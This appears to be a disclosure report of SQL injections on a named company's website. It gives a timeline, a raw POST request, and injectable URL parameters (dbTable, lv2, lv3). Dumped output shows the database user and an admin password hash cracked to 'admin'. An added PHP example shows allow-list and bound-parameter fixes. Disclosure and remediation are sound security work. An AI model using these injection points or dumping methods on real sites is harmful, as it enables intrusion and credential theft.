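2015-11-20: Details reported to the vendor; awaiting vendor handling
2015-11-24: Vendor confirmed; details disclosed to the vendor only
2015-12-04: Details disclosed to core white hats and experts in related fields
2015-12-14: Details disclosed to regular white hats
2015-12-24: Details disclosed to trainee white hats
2016-01-11: Details disclosed to the public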
Multiple SQL injections on the main site of 活力健國際有限公司 (admin and user passwords can be obtained)
First: POST injection
POST /content/layout/product/getProoductInfo.php HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/content/index.php?lang=2&lv1=8&lv2=6
Content-Length: 23
Cookie: PHPSESSID=d7vjgbferqt9idrpurmm57jeq3
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

dbTable=2036_a8_b6_c10_
Second: http://**.**.**.**/content/index.php?lang=2&lv1=8&lv2=9 (parameter lv2)
Third: http://**.**.**.**/content/index.php?lang=3&lv1=9&lv2=3&lv3=3 (parameter lv3)
current user: 'web91u1@localhost'
current database: 'web91db1'
Database: information_schema [17 tables]
Database: web91db1 [180 tables]
Table: Password
[1 entry]
+----+------------------------------------------+-----------+---------------------+---------------------+
| id | password                                 | loginName | createDate          | lastModDate         |
+----+------------------------------------------+-----------+---------------------+---------------------+
| 1  | 21232f297a57a5a743894a0e4a801fc3 (admin) | admin     | 2009-08-29 21:10:31 | 2009-08-29 21:10:31 |
+----+------------------------------------------+-----------+---------------------+---------------------+
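Added example, not part of the original report and not the vendor's code: one way the three inputs named above (dbTable, lv2, lv3) could be handled on the server side. It assumes dbTable is a table-name prefix; the `product` suffix, the column names and the in-memory SQLite database are constructed for illustration.

```php
<?php
declare(strict_types=1);
// Added example. Table suffix, column names and the SQLite stand-in are assumptions.

// Identifiers cannot be bound as query parameters, so dbTable is matched
// against a fixed server-side allow-list instead of being concatenated as sent.
const PRODUCT_PREFIXES = ['2036_a8_b6_c10_'];

function resolveProductTable(string $dbTable): string
{
    if (!in_array($dbTable, PRODUCT_PREFIXES, true)) {
        throw new InvalidArgumentException('unknown dbTable');
    }
    return $dbTable . 'product';
}

// lv2 / lv3 are treated as numeric menu ids: anything but an integer is rejected.
function parseLevel(string $raw): int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        throw new InvalidArgumentException('invalid level id');
    }
    return $id;
}

function fetchProducts(PDO $pdo, string $dbTable, string $lv): array
{
    $table = resolveProductTable($dbTable);           // allow-listed identifier
    $stmt = $pdo->prepare("SELECT id, name FROM \"$table\" WHERE lv = :lv");
    $stmt->execute([':lv' => parseLevel($lv)]);       // value bound, never inlined
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed stand-in database and inputs.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE "2036_a8_b6_c10_product" (id INTEGER, name TEXT, lv INTEGER)');
$pdo->exec("INSERT INTO \"2036_a8_b6_c10_product\" VALUES (1, 'sample', 6)");

foreach ([['2036_a8_b6_c10_', '6'], ['2036_a8_b6_c10_', '6 OR 1=1'], ['Password', '6']] as [$t, $lv]) {
    try {
        echo json_encode(fetchProducts($pdo, $t, $lv)), PHP_EOL;
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $e->getMessage(), PHP_EOL;
    }
}
```

On MySQL the identifier would be quoted with backticks rather than double quotes; the allow-list check, not the quoting, is what keeps the table name under server control.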
Severity: Medium
Vulnerability Rank: 5
Confirmed at: 2015-11-24 12:02
Referred to related parties.
None yet